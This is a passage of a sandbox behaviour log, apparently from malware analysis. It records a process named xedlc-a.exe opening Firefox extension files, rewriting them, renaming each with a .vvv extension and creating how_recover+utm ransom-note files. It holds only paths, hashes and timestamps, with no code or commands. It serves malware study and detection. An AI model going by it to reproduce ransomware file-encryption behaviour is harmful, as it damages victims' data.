54808.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54809.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54810.            ads:
54811.          fid (ads:): 281474976765891
54812.          ntstatus: 0x0
54813.          CreateOptions: 0x0
54814.        file:
54815.          timestamp: 82355
54816.          mode: rename
54817.          sequenceNumber: 1288
54818.          filesize: 5502
54819.          md5sum: f56a220df36eef77f824f0c858720f02
54820.          sha1sum: 22598e075a61f0d25d876fec777a00d6d4efa6c3
54821.          processinfo:
54822.            pid: 1056
54823.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54824.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54825.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js
54826.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traceback.js.vvv
54827.            ads:
54828.          fid (ads:): 281474976765891
54829.          ntstatus: 0x0
54830.          CreateOptions: 0x0
54831.        file:
54832.          timestamp: 82367
54833.          mode: open
54834.          sequenceNumber: 1289
54835.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js
54836.          filesize: 11340
54837.          processinfo:
54838.            pid: 1056
54839.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54840.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54841.            ads:
54842.          fid (ads:): 281474976765870
54843.          ntstatus: 0x0
54844.          CreateOptions: 0x60
54845.        file:
54846.          timestamp: 82479
54847.          mode: close
54848.          sequenceNumber: 1290
54849.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js
54850.          filesize: 11758
54851.          md5sum: 2e2601f7c5b94ac14ccdd8b5dee4ec81
54852.          sha1sum: c00b3387ef36c628ff080d05048ef2bbb18f3a03
54853.          processinfo:
54854.            pid: 1056
54855.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54856.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54857.            ads:
54858.          fid (ads:): 281474976765870
54859.          ntstatus: 0x0
54860.          CreateOptions: 0x0
54861.        file:
54862.          timestamp: 82492
54863.          mode: rename
54864.          sequenceNumber: 1291
54865.          filesize: 11758
54866.          md5sum: 2e2601f7c5b94ac14ccdd8b5dee4ec81
54867.          sha1sum: c00b3387ef36c628ff080d05048ef2bbb18f3a03
54868.          processinfo:
54869.            pid: 1056
54870.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54871.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54872.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js
54873.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\core.js.vvv
54874.            ads:
54875.          fid (ads:): 281474976765870
54876.          ntstatus: 0x0
54877.          CreateOptions: 0x0
54878.        file:
54879.          timestamp: 82504
54880.          mode: created
54881.          sequenceNumber: 1292
54882.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.txt
54883.          processinfo:
54884.            pid: 1056
54885.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54886.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54887.            ads:
54888.          fid (ads:): 281474976778353
54889.          ntstatus: 0x0
54890.          CreateOptions: 0x60
54891.        file:
54892.          timestamp: 82512
54893.          mode: close
54894.          sequenceNumber: 1293
54895.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.txt
54896.          filesize: 2682
54897.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
54898.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
54899.          processinfo:
54900.            pid: 1056
54901.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54902.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54903.            ads:
54904.          fid (ads:): 281474976778353
54905.          ntstatus: 0x0
54906.          CreateOptions: 0x0
54907.        file:
54908.          timestamp: 82587
54909.          mode: created
54910.          sequenceNumber: 1294
54911.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.html
54912.          processinfo:
54913.            pid: 1056
54914.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54915.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54916.            ads:
54917.          fid (ads:): 281474976778354
54918.          ntstatus: 0x0
54919.          CreateOptions: 0x60
54920.        file:
54921.          timestamp: 82596
54922.          mode: close
54923.          sequenceNumber: 1295
54924.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits\how_recover+utm.html
54925.          filesize: 9495
54926.          md5sum: 95f596a25dff51b6af2042b1bbe02985
54927.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
54928.          processinfo:
54929.            pid: 1056
54930.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54931.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54932.            ads:
54933.          fid (ads:): 281474976778354
54934.          ntstatus: 0x0
54935.          CreateOptions: 0x0
54936.        file:
54937.          timestamp: 82605
54938.          mode: open
54939.          sequenceNumber: 1296
54940.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js
54941.          filesize: 7550
54942.          processinfo:
54943.            pid: 1056
54944.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54945.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54946.            ads:
54947.          fid (ads:): 281474976765893
54948.          ntstatus: 0x0
54949.          CreateOptions: 0x60
54950.        file:
54951.          timestamp: 82650
54952.          mode: close
54953.          sequenceNumber: 1297
54954.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js
54955.          filesize: 7966
54956.          md5sum: 474a76c62e29a82cdcb0404bd08efe2c
54957.          sha1sum: f60d690862b13e79ef3c64b2b8bfa07224566e7a
54958.          processinfo:
54959.            pid: 1056
54960.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54961.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54962.            ads:
54963.          fid (ads:): 281474976765893
54964.          ntstatus: 0x0
54965.          CreateOptions: 0x0
54966.        file:
54967.          timestamp: 82662
54968.          mode: rename
54969.          sequenceNumber: 1298
54970.          filesize: 7966
54971.          md5sum: 474a76c62e29a82cdcb0404bd08efe2c
54972.          sha1sum: f60d690862b13e79ef3c64b2b8bfa07224566e7a
54973.          processinfo:
54974.            pid: 1056
54975.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54976.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54977.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js
54978.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\traits.js.vvv
54979.            ads:
54980.          fid (ads:): 281474976765893
54981.          ntstatus: 0x0
54982.          CreateOptions: 0x0
54983.        file:
54984.          timestamp: 82676
54985.          mode: open
54986.          sequenceNumber: 1299
54987.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js
54988.          filesize: 11432
54989.          processinfo:
54990.            pid: 1056
54991.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
54992.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
54993.            ads:
54994.          fid (ads:): 562949953476272
54995.          ntstatus: 0x0
54996.          CreateOptions: 0x60
54997.        file:
54998.          timestamp: 82712
54999.          mode: close
55000.          sequenceNumber: 1300
55001.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js
55002.          filesize: 11854
55003.          md5sum: e4f0cbe7bd2a11b9659b6e575a24264f
55004.          sha1sum: 73e16ff728826269b62b3f26e6b88d600a9a3b00
55005.          processinfo:
55006.            pid: 1056
55007.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55008.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55009.            ads:
55010.          fid (ads:): 562949953476272
55011.          ntstatus: 0x0
55012.          CreateOptions: 0x0
55013.        file:
55014.          timestamp: 82724
55015.          mode: rename
55016.          sequenceNumber: 1301
55017.          filesize: 11854
55018.          md5sum: e4f0cbe7bd2a11b9659b6e575a24264f
55019.          sha1sum: 73e16ff728826269b62b3f26e6b88d600a9a3b00
55020.          processinfo:
55021.            pid: 1056
55022.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55023.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55024.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js
55025.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\type.js.vvv
55026.            ads:
55027.          fid (ads:): 562949953476272
55028.          ntstatus: 0x0
55029.          CreateOptions: 0x0
55030.        file:
55031.          timestamp: 82736
55032.          mode: open
55033.          sequenceNumber: 1302
55034.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js
55035.          filesize: 3479
55036.          processinfo:
55037.            pid: 1056
55038.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55039.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55040.            ads:
55041.          fid (ads:): 281474976765881
55042.          ntstatus: 0x0
55043.          CreateOptions: 0x60
55044.        file:
55045.          timestamp: 82891
55046.          mode: close
55047.          sequenceNumber: 1303
55048.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js
55049.          filesize: 3902
55050.          md5sum: 9c2cca59f1d27e8db9626c5bf8e21293
55051.          sha1sum: 10f1b9672c8d3e4f140432aa1778ea76e23dff04
55052.          processinfo:
55053.            pid: 1056
55054.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55055.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55056.            ads:
55057.          fid (ads:): 281474976765881
55058.          ntstatus: 0x0
55059.          CreateOptions: 0x0
55060.        file:
55061.          timestamp: 82904
55062.          mode: rename
55063.          sequenceNumber: 1304
55064.          filesize: 3902
55065.          md5sum: 9c2cca59f1d27e8db9626c5bf8e21293
55066.          sha1sum: 10f1b9672c8d3e4f140432aa1778ea76e23dff04
55067.          processinfo:
55068.            pid: 1056
55069.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55071.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js
55072.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test-finder.js.vvv
55073.            ads:
55074.          fid (ads:): 281474976765881
55075.          ntstatus: 0x0
55076.          CreateOptions: 0x0
55077.        file:
55078.          timestamp: 82916
55079.          mode: open
55080.          sequenceNumber: 1305
55081.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js
55082.          filesize: 11539
55083.          processinfo:
55084.            pid: 1056
55085.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55086.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55087.            ads:
55088.          fid (ads:): 281474976765883
55089.          ntstatus: 0x0
55090.          CreateOptions: 0x60
55091.        file:
55092.          timestamp: 83108
55093.          mode: close
55094.          sequenceNumber: 1306
55095.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js
55096.          filesize: 11966
55097.          md5sum: 244363e6192522099f35fdc3ac59790d
55098.          sha1sum: 4adb5e6341bba1ad3f994c3392a6281171cf2d28
55099.          processinfo:
55100.            pid: 1056
55101.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55102.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55103.            ads:
55104.          fid (ads:): 281474976765883
55105.          ntstatus: 0x0
55106.          CreateOptions: 0x0
55107.        file:
55108.          timestamp: 83121
55109.          mode: rename
55110.          sequenceNumber: 1307
55111.          filesize: 11966
55112.          md5sum: 244363e6192522099f35fdc3ac59790d
55113.          sha1sum: 4adb5e6341bba1ad3f994c3392a6281171cf2d28
55114.          processinfo:
55115.            pid: 1056
55116.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55117.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55118.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js
55119.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unit-test.js.vvv
55120.            ads:
55121.          fid (ads:): 281474976765883
55122.          ntstatus: 0x0
55123.          CreateOptions: 0x0
55124.        file:
55125.          timestamp: 83133
55126.          mode: open
55127.          sequenceNumber: 1308
55128.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js
55129.          filesize: 1278
55130.          processinfo:
55131.            pid: 1056
55132.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55133.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55134.            ads:
55135.          fid (ads:): 562949953476254
55136.          ntstatus: 0x0
55137.          CreateOptions: 0x60
55138.        file:
55139.          timestamp: 83141
55140.          mode: close
55141.          sequenceNumber: 1309
55142.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js
55143.          filesize: 1694
55144.          md5sum: a3102a738b335863760fe02b41dbf2e3
55145.          sha1sum: e7cd74752fbc4dc59fce40ec8dfd2892aecf6252
55146.          processinfo:
55147.            pid: 1056
55148.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55149.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55150.            ads:
55151.          fid (ads:): 562949953476254
55152.          ntstatus: 0x0
55153.          CreateOptions: 0x0
55154.        file:
55155.          timestamp: 83153
55156.          mode: rename
55157.          sequenceNumber: 1310
55158.          filesize: 1694
55159.          md5sum: a3102a738b335863760fe02b41dbf2e3
55160.          sha1sum: e7cd74752fbc4dc59fce40ec8dfd2892aecf6252
55161.          processinfo:
55162.            pid: 1056
55163.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55164.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55165.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js
55166.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\unload.js.vvv
55167.            ads:
55168.          fid (ads:): 562949953476254
55169.          ntstatus: 0x0
55170.          CreateOptions: 0x0
55171.        file:
55172.          timestamp: 83166
55173.          mode: open
55174.          sequenceNumber: 1311
55175.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js
55176.          filesize: 4008
55177.          processinfo:
55178.            pid: 1056
55179.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55180.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55181.            ads:
55182.          fid (ads:): 281474976765914
55183.          ntstatus: 0x0
55184.          CreateOptions: 0x60
55185.        file:
55186.          timestamp: 83234
55187.          mode: close
55188.          sequenceNumber: 1312
55189.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js
55190.          filesize: 4430
55191.          md5sum: f0420d1676881ac23bcc299e6e4d2faf
55192.          sha1sum: b7da9ab3c142e8c373b4b7dc308ab29d2d87fd02
55193.          processinfo:
55194.            pid: 1056
55195.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55196.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55197.            ads:
55198.          fid (ads:): 281474976765914
55199.          ntstatus: 0x0
55200.          CreateOptions: 0x0
55201.        file:
55202.          timestamp: 83247
55203.          mode: rename
55204.          sequenceNumber: 1313
55205.          filesize: 4430
55206.          md5sum: f0420d1676881ac23bcc299e6e4d2faf
55207.          sha1sum: b7da9ab3c142e8c373b4b7dc308ab29d2d87fd02
55208.          processinfo:
55209.            pid: 1056
55210.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55211.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55212.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js
55213.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url-e10s-adapter.js.vvv
55214.            ads:
55215.          fid (ads:): 281474976765914
55216.          ntstatus: 0x0
55217.          CreateOptions: 0x0
55218.        file:
55219.          timestamp: 83258
55220.          mode: open
55221.          sequenceNumber: 1314
55222.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js
55223.          filesize: 4269
55224.          processinfo:
55225.            pid: 1056
55226.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55227.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55228.            ads:
55229.          fid (ads:): 281474976765852
55230.          ntstatus: 0x0
55231.          CreateOptions: 0x60
55232.        file:
55233.          timestamp: 83333
55234.          mode: close
55235.          sequenceNumber: 1315
55236.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js
55237.          filesize: 4686
55238.          md5sum: 4d808c1edcba1ed50a0e096568b3b57f
55239.          sha1sum: a7a1931bb1c946fb8b790b80f592067e52cecf80
55240.          processinfo:
55241.            pid: 1056
55242.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55243.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55244.            ads:
55245.          fid (ads:): 281474976765852
55246.          ntstatus: 0x0
55247.          CreateOptions: 0x0
55248.        file:
55249.          timestamp: 83346
55250.          mode: rename
55251.          sequenceNumber: 1316
55252.          filesize: 4686
55253.          md5sum: 4d808c1edcba1ed50a0e096568b3b57f
55254.          sha1sum: a7a1931bb1c946fb8b790b80f592067e52cecf80
55255.          processinfo:
55256.            pid: 1056
55257.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55258.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55259.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js
55260.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\url.js.vvv
55261.            ads:
55262.          fid (ads:): 281474976765852
55263.          ntstatus: 0x0
55264.          CreateOptions: 0x0
55265.        file:
55266.          timestamp: 83361
55267.          mode: open
55268.          sequenceNumber: 1317
55269.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js
55270.          filesize: 3912
55271.          processinfo:
55272.            pid: 1056
55273.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55274.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55275.            ads:
55276.          fid (ads:): 281474976765877
55277.          ntstatus: 0x0
55278.          CreateOptions: 0x60
55279.        file:
55280.          timestamp: 83423
55281.          mode: close
55282.          sequenceNumber: 1318
55283.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js
55284.          filesize: 4334
55285.          md5sum: a9390ab0bd8617f9e6a43d8fb361478e
55286.          sha1sum: 350e075d9b77658a977bf43d490e95089df42d2f
55287.          processinfo:
55288.            pid: 1056
55289.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55290.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55291.            ads:
55292.          fid (ads:): 281474976765877
55293.          ntstatus: 0x0
55294.          CreateOptions: 0x0
55295.        file:
55296.          timestamp: 83437
55297.          mode: rename
55298.          sequenceNumber: 1319
55299.          filesize: 4334
55300.          md5sum: a9390ab0bd8617f9e6a43d8fb361478e
55301.          sha1sum: 350e075d9b77658a977bf43d490e95089df42d2f
55302.          processinfo:
55303.            pid: 1056
55304.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55305.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55306.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js
55307.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\data.js.vvv
55308.            ads:
55309.          fid (ads:): 281474976765877
55310.          ntstatus: 0x0
55311.          CreateOptions: 0x0
55312.        file:
55313.          timestamp: 83451
55314.          mode: open
55315.          sequenceNumber: 1320
55316.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js
55317.          filesize: 2710
55318.          processinfo:
55319.            pid: 1056
55320.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55321.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55322.            ads:
55323.          fid (ads:): 562949953476245
55324.          ntstatus: 0x0
55325.          CreateOptions: 0x60
55326.        file:
55327.          timestamp: 83461
55328.          mode: close
55329.          sequenceNumber: 1321
55330.          value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js
55331.          filesize: 3134
55332.          md5sum: 76306ae62aa34d21afd7116466fc62f1
55333.          sha1sum: 1e31000b0212daff70267475dcaa3ea987392437
55334.          processinfo:
55335.            pid: 1056
55336.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55338.            ads:
55339.          fid (ads:): 562949953476245
55340.          ntstatus: 0x0
55341.          CreateOptions: 0x0
55342.        file:
55343.          timestamp: 83512
55344.          mode: rename
55345.          sequenceNumber: 1322
55346.          filesize: 3134
55347.          md5sum: 76306ae62aa34d21afd7116466fc62f1
55348.          sha1sum: 1e31000b0212daff70267475dcaa3ea987392437
55349.          processinfo:
55350.            pid: 1056
55351.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
55352.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
55353.          old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js
55354.          new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\jid1-YahAIqyhSHBWtQ@jetpack\resources\jid1-yahaiqyhshbwtq-at-jetpack-api-utils-lib\utils\function.js.vvv
55355.            ads:
